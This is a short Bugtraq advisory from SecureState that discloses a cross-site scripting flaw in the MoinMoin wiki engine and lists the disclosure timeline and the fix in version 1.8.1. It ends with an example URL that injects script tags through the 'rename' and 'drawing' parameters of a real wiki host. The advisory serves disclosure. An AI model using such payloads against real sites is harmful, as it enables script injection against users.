MoinMoin Wiki Engine XSS Vulnerability

From: swhite@securestate.com
To: bugtraq@securityfocus.com
Cc:
Subject: MoinMoin Wiki Engine XSS Vulnerability
Date:


MoinMoin Wiki Engine Cross-Site Scripting

Discovered by: SecureState R&D Team (sasquatch)

Website: www.securestate.com

Discovered: 01-08-09

Vendor Notified: 01-08-09

Vendor Fix Issued:  01-11-09 (http://hg.moinmo.in/moin/1.8/rev/8cb4d34ccbc1)

Vendor Fix:  Upgrade to version 1.8.1 

Public Posting: 01-19-09

Example:
http://moinmo.in/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.